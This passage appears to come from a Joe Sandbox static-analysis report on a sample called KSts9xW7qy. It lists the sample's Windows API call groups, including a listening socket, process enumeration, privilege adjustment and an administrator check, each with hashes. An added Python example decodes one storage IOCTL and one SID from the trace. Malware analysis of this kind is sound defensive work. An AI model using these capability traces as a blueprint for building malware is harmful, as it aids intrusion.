                                                                        • Instruction ID: 9b98f70382cfa6f2e6770eaa64d9b9bea534ae0c25d066b07efe80f34bf58f83
                                                                        • Opcode Fuzzy Hash: 0b826539c724c99d106025d8e2961d7a43ac692593bcc3bbeded55e2cd6ac0e6
                                                                        • Instruction Fuzzy Hash: 0901F77165C2116EF7681674DC4ABFF76589B85744F152824FDC3B64D2DA60AE00C1B0
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EC8CA8
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8CB7
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00EC8CD3
                                                                        • listen.WSOCK32(00000000,00000005), ref: 00EC8CE2
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8CFC
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00EC8D10
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                        • String ID:
                                                                        • API String ID: 1279440585-0
                                                                        • Opcode ID: 09bba2fa07b274e1410ed42e0cdd6ae84131abf4d288221a49c6f731f8d0930f
                                                                        • Instruction ID: 4cdc587752bb655ad31b01cb93d1a9f3cb4d41f997facb0be85c2b872561d5cc
                                                                        • Opcode Fuzzy Hash: 09bba2fa07b274e1410ed42e0cdd6ae84131abf4d288221a49c6f731f8d0930f
                                                                        • Instruction Fuzzy Hash: 3A2180316041009FC714AF68CE45F7EB7E9AF84314F149159F956BB2D2CB30AD46CB51
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00EB6554
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EB6564
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00EB6583
                                                                        • __wsplitpath.LIBCMT ref: 00EB65A7
                                                                        • _wcscat.LIBCMT ref: 00EB65BA
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00EB65F9
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                        • String ID:
                                                                        • API String ID: 1605983538-0
                                                                        • Opcode ID: a3f1e8affcc98b899c70570ea7bb27fa2264002861e751c3639e0e5f4269c71a
                                                                        • Instruction ID: 427cf126cb4c0c07dfd63381655be3f2623c8e4afc9a8f070ec4405477eea3c7
                                                                        • Opcode Fuzzy Hash: a3f1e8affcc98b899c70570ea7bb27fa2264002861e751c3639e0e5f4269c71a
                                                                        • Instruction Fuzzy Hash: 58218071901219AFDB20ABA4CC88BEEBBFCAB48304F5014E5E545F7141EB759F85CB60
                                                                        APIs
                                                                          • Part of subcall function 00ECA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00ECA84E
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00EC9296
                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00EC92B9
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: acced4962f2e8f16fb3016716dedc571c2a3b1c42a1c4f45a3391ff9096b9ae1
                                                                        • Instruction ID: b235b0ceeccea6062ca91f53f54e5d9fd76738d6cd3775f1fc7b88fa7237a312
                                                                        • Opcode Fuzzy Hash: acced4962f2e8f16fb3016716dedc571c2a3b1c42a1c4f45a3391ff9096b9ae1
                                                                        • Instruction Fuzzy Hash: 2841CD70600204AFDB14BB688C86E7EB7EDEF44724F14944CF95ABB2D2DB749D028B91
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EBEB8A
                                                                        • _wcscmp.LIBCMT ref: 00EBEBBA
                                                                        • _wcscmp.LIBCMT ref: 00EBEBCF
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EBEBE0
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EBEC0E
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 2387731787-0
                                                                        • Opcode ID: 797acd018d0fa06bf3642c1a727f31f8e56de0af13ac6273ca062eac4c094d1f
                                                                        • Instruction ID: 5a02b63131a36a441e662dfaa03de61740b097dfa00bb617f94cde01855ee758
                                                                        • Opcode Fuzzy Hash: 797acd018d0fa06bf3642c1a727f31f8e56de0af13ac6273ca062eac4c094d1f
                                                                        • Instruction Fuzzy Hash: 9041B1356047029FCB18DF28C491AEAB7E4FF49324F10455DE95AAB3A1DB31E944CF91
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                        • String ID:
                                                                        • API String ID: 292994002-0
                                                                        • Opcode ID: f841c53393e5267840af8fe5217820ebc340659e7caf01dc68e0135d6010325f
                                                                        • Instruction ID: 4a8740bac2acbfe9c7c8578a464a485c15b32c66f3f4e4c98bc9103755eed842
                                                                        • Opcode Fuzzy Hash: f841c53393e5267840af8fe5217820ebc340659e7caf01dc68e0135d6010325f
                                                                        • Instruction Fuzzy Hash: 5E119D31305211AFE7212F269D44A6FBBD9EF94764B05642AF949F7381CF30A90786A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                        • API String ID: 0-1546025612
                                                                        • Opcode ID: 009aa8439fe6cf5f7f14346d16714807ff1d6824b0dbc22e75de05f38c03741d
                                                                        • Instruction ID: dafcfcb048f0144e33e2dc9d61e798d32d96317fd00ad7a2b104a7e4e94dd4f3
                                                                        • Opcode Fuzzy Hash: 009aa8439fe6cf5f7f14346d16714807ff1d6824b0dbc22e75de05f38c03741d
                                                                        • Instruction Fuzzy Hash: E8928B71A0021ECBDF28CF58C9407FDB7B1AF94318F2495AAE91AB7281D7319D81DB91
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E8E014,74DF0AE0,00E8DEF1,00F0DC38,?,?), ref: 00E8E02C
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E8E03E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        • Opcode ID: dafdff0a0d3bcc51eeb37446b9aff5db792d5061e7ce0ee5eb23a1865e55bb05
                                                                        • Instruction ID: dddc4e67b16dae801ca60b347b61e4fe39f4704712b6312ac8b91f819b157d2d
                                                                        • Opcode Fuzzy Hash: dafdff0a0d3bcc51eeb37446b9aff5db792d5061e7ce0ee5eb23a1865e55bb05
                                                                        • Instruction Fuzzy Hash: 5ED0A730404B22AFC7315F61FD086227AD5AF0030CF194819E889F2250E7B4CC84D751
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EB13DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: ($|
                                                                        • API String ID: 1659193697-1631851259
                                                                        • Opcode ID: 33c8a5bf0341624e0163808d8a106ed6ef1dd890bfd1f41ad2bf71d41f557913
                                                                        • Instruction ID: 2414bc43e19814f09e864deb3e88e6515b20689b08c3ce04c6feef5426ec966b
                                                                        • Opcode Fuzzy Hash: 33c8a5bf0341624e0163808d8a106ed6ef1dd890bfd1f41ad2bf71d41f557913
                                                                        • Instruction Fuzzy Hash: F6322775A007059FC728CF69C4909AAB7F0FF48324B51D5AEE4AAEB3A1D770E941CB44
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E8B22F
                                                                          • Part of subcall function 00E8B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E8B5A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Proc$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 2749884682-0
                                                                        • Opcode ID: 3e8f70be6dde3e8edd5116907ade7a09d2cc2e1a9472f83f715681e72d390579
                                                                        • Instruction ID: 394c94f44667981a99500d2f3c1fc9ddb4f81350549ff34c3334a1ebc3d16f4b
                                                                        • Opcode Fuzzy Hash: 3e8f70be6dde3e8edd5116907ade7a09d2cc2e1a9472f83f715681e72d390579
                                                                        • Instruction Fuzzy Hash: 19A14870114149FADB28BB2A5D89DBF299DEB45358F14711AF40EFA2B1CB159C01E372
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EC43BF,00000000), ref: 00EC4FA6
                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EC4FD2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        • Opcode ID: c7303550e9d1c132757b64cd96934f2bdc1d515c3f6c76a1c06324f0730fbe45
                                                                        • Instruction ID: efe0fc11c8158eec3b71047d4226bdc4581c48b7e6b3d0645e05b379ee060554
                                                                        • Opcode Fuzzy Hash: c7303550e9d1c132757b64cd96934f2bdc1d515c3f6c76a1c06324f0730fbe45
                                                                        • Instruction Fuzzy Hash: 0341D8B2604609BFEB209E94DE81FBF77FDEB40758F10602EF605B6180D672AE42D650
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00EBE20D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EBE267
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EBE2B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1682464887-0
                                                                        • Opcode ID: 6346ec5da73fd41a4fa525989d360525a05886de165af9f5f7e2908ebbffbc3e
                                                                        • Instruction ID: ec5fa52542d479be79b5600a4f0635f695d476b6bf7b02d303d489f3a7329729
                                                                        • Opcode Fuzzy Hash: 6346ec5da73fd41a4fa525989d360525a05886de165af9f5f7e2908ebbffbc3e
                                                                        • Instruction Fuzzy Hash: 72213C35A00118EFCB00EFA5D885AEEFBF9FF89314F1484A9E949A7361DB319915CB50
                                                                        APIs
                                                                          • Part of subcall function 00E8F4EA: std::exception::exception.LIBCMT ref: 00E8F51E
                                                                          • Part of subcall function 00E8F4EA: __CxxThrowException@8.LIBCMT ref: 00E8F533
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EAB180
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EAB1AD
                                                                        • GetLastError.KERNEL32 ref: 00EAB1BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1922334811-0
                                                                        • Opcode ID: 815a66f177899a812247c82aa119afaabc90ca3717c208784dcdd5506ff85db4
                                                                        • Instruction ID: 86c9c767e86bf7f54820e5cc8291584b0660e4bb61883769fb9b702c3393f48b
                                                                        • Opcode Fuzzy Hash: 815a66f177899a812247c82aa119afaabc90ca3717c208784dcdd5506ff85db4
                                                                        • Instruction Fuzzy Hash: F211BCB2504204AFE718AF64DC86D2BBBEDEB49310B20852EE05AA7241DB70FC41CB60
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EB66AF
                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00EB66EC
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EB66F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                        • String ID:
                                                                        • API String ID: 33631002-0
                                                                        • Opcode ID: 504dead4102a6f6a71204ea9683bfabd5357bcc532e15182f81ce5e702dc7710
                                                                        • Instruction ID: 5b2d2f6897ec7304d80bdb51b3a30b40f0d99c672794028fa440ea602c124c65
                                                                        • Opcode Fuzzy Hash: 504dead4102a6f6a71204ea9683bfabd5357bcc532e15182f81ce5e702dc7710
                                                                        • Instruction Fuzzy Hash: 811182B1901229BFE7109BA8DC45FEF7BACEB08718F004556F901F7190C2789E0487A1
                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00EB7223
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EB723A
                                                                        • FreeSid.ADVAPI32(?), ref: 00EB724A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: c5d5750b55c1464d90f6bd4683d83750b0c3a8954ca27e13a6f27b9d4a88dd4b
                                                                        • Instruction ID: 0c9ff54a3285571a4b66fe0b3b72b0ba01694c9e5e97d91f728ff69935aa8dfb
                                                                        • Opcode Fuzzy Hash: c5d5750b55c1464d90f6bd4683d83750b0c3a8954ca27e13a6f27b9d4a88dd4b
                                                                        • Instruction Fuzzy Hash: 31F01D76A14209BFDF04DFE5DD89EFEBBBAEF48305F104469A602E2191E6709A44DB10
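                                                                        Two of the call lines above carry most of their meaning in raw argument values: the DeviceIoControl control code 002D1400 (in the CreateFileW / DeviceIoControl / CloseHandle function) and the AllocateAndInitializeSid sub-authorities 00000020 and 00000220 (in the function directly above). The Python below is an added example, not code from this report or from the sample, that parses trace lines of this shape and decodes those two values. It splits the control code into the CTL_CODE fields (device type 0x2D = FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS, which is IOCTL_STORAGE_QUERY_PROPERTY) and rebuilds a SID from the sub-authorities 32 and 544. The constant names are taken from the Windows SDK headers, the tables of well-known control codes and SIDs are the example's own, and every function name (parse_trace_line, decode_ioctl, build_sid, sid_to_string, sid_from_trace_args, annotate) is the example's own. The trace records the identifier-authority pointer only as "?", so SECURITY_NT_AUTHORITY (5) is an assumption; on that assumption the SID is S-1-5-32-544 (BUILTIN\Administrators).

```python
"""Decode the raw argument values recorded in a Joe Sandbox API trace.

Added example, not code from the report or the sample.  It interprets two call
lines above: the DeviceIoControl control code 002D1400 and the
AllocateAndInitializeSid sub-authorities 00000020 / 00000220.  Constant names
are assumptions copied from the Windows SDK headers (winioctl.h, ntddstor.h,
winnt.h), not from this page; the trace records the SID identifier authority
only as "?", so SECURITY_NT_AUTHORITY (5) is assumed.
"""
import re
import struct

# One trace line looks like:  Api.MODULE(arg,arg,...), ref: address
TRACE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

def parse_trace_line(line):
    """Hex args become ints, '?' (not recovered) becomes None, other text stays."""
    m = TRACE_RE.search(line)
    if not m:
        raise ValueError("not an API trace line: %r" % line)
    args = []
    for raw in (a.strip() for a in m.group("args").split(",")):
        try:
            args.append(None if raw == "?" else int(raw, 16))
        except ValueError:          # e.g. 'kernel32.dll' in the LoadLibraryA line
            args.append(raw)
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}

# CTL_CODE(DeviceType, Function, Method, Access) field names (assumed from the SDK).
METHOD = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS", 3: "FILE_READ|FILE_WRITE"}
DEVICE_TYPE = {0x02: "FILE_DEVICE_CD_ROM", 0x07: "FILE_DEVICE_DISK",
               0x09: "FILE_DEVICE_FILE_SYSTEM", 0x2D: "FILE_DEVICE_MASS_STORAGE"}

def ctl_code(device_type, function, method, access):
    """Python twin of the winioctl.h CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method

# Regenerated from their CTL_CODE definitions so a hex typo cannot mislabel a code.
KNOWN_IOCTLS = {
    ctl_code(0x2D, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
    ctl_code(0x2D, 0x0420, 0, 0): "IOCTL_STORAGE_GET_DEVICE_NUMBER",
    ctl_code(0x2D, 0x0200, 0, 1): "IOCTL_STORAGE_CHECK_VERIFY",
    ctl_code(0x07, 0x0000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    ctl_code(0x07, 0x0017, 0, 1): "IOCTL_DISK_GET_LENGTH_INFO",
}

def decode_ioctl(code):
    """Split a control code into its four CTL_CODE fields and name them."""
    f = {"device_type": (code >> 16) & 0xFFFF, "access": (code >> 14) & 0x3,
         "function": (code >> 2) & 0xFFF, "method": code & 0x3}
    f["name"] = KNOWN_IOCTLS.get(code, "unknown")
    f["device_type_name"] = DEVICE_TYPE.get(f["device_type"], "unknown")
    f["method_name"], f["access_name"] = METHOD[f["method"]], ACCESS[f["access"]]
    return f

SECURITY_NT_AUTHORITY = 5   # assumed: the trace shows the authority pointer as '?'
WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators",
                   "S-1-5-32-545": "BUILTIN\\Users", "S-1-5-18": "NT AUTHORITY\\SYSTEM"}

def build_sid(authority, subauthorities):
    """In-memory SID layout: revision 1, sub-authority count, 6-byte big-endian
    identifier authority, then each sub-authority as a little-endian DWORD."""
    if not 1 <= len(subauthorities) <= 15:
        raise ValueError("a SID carries 1..15 sub-authorities")
    head = struct.pack("<BB", 1, len(subauthorities)) + authority.to_bytes(6, "big")
    return head + b"".join(struct.pack("<I", s) for s in subauthorities)

def sid_to_string(sid):
    """Binary SID -> 'S-1-<authority>-<sub>-...'."""
    revision, count = sid[0], sid[1]
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)

def sid_from_trace_args(args, assumed_authority=SECURITY_NT_AUTHORITY):
    """AllocateAndInitializeSid(pAuthority, nCount, dwSub0..dwSub7, ppSid):
    the authority pointer is '?' in the trace, so the caller supplies it."""
    return sid_to_string(build_sid(assumed_authority, args[2:2 + args[1]]))

# Constructed copies of two call lines from the report above.
SAMPLE_LINES = [
    "DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00EB66EC",
    "AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,"
    "00000000,00000000,00000000,00000000,?,?), ref: 00EB7223",
]

def annotate(line):
    """Return a one-line reading of a trace line, or just the API name."""
    call = parse_trace_line(line)
    if call["api"] == "DeviceIoControl":
        f = decode_ioctl(call["args"][1])
        return "%s -> %s (%s, %s, %s)" % (call["api"], f["name"], f["device_type_name"],
                                          f["method_name"], f["access_name"])
    if call["api"] == "AllocateAndInitializeSid":
        sid = sid_from_trace_args(call["args"])
        return "%s -> %s (%s)" % (call["api"], sid, WELL_KNOWN_SIDS.get(sid, "not well-known"))
    return call["api"]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(annotate(sample))
```

                                                                        Run stand-alone it prints one annotated line per sample. Read together with the CreateFileW in the same function (desired access 00000080 = FILE_READ_ATTRIBUTES, share mode 00000003 = FILE_SHARE_READ | FILE_SHARE_WRITE, disposition 00000003 = OPEN_EXISTING), the sequence is an attribute-only open followed by a storage property query, not a data read. The report draws no conclusion from this call sequence, so treat the decode as context for reading the trace rather than as an indicator on its own.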
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EBF599
                                                                        • FindClose.KERNEL32(00000000), ref: 00EBF5C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 370b096a05558100d73a65be5d1b59f4f37171d7731823726ce9f11a8aa9d317
                                                                        • Instruction ID: d1943b0935dda04bc32378089aed452855b7ebcaa878970f84b817c16ac8f028
                                                                        • Opcode Fuzzy Hash: 370b096a05558100d73a65be5d1b59f4f37171d7731823726ce9f11a8aa9d317
                                                                        • Instruction Fuzzy Hash: AC115B726046009FD710EF29D845A6EB7E9FF84324F00895EF9A9A7291DB30AD058B81
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00ECBE6A,?,?,00000000,?), ref: 00EBCEA7
                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00ECBE6A,?,?,00000000,?), ref: 00EBCEB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
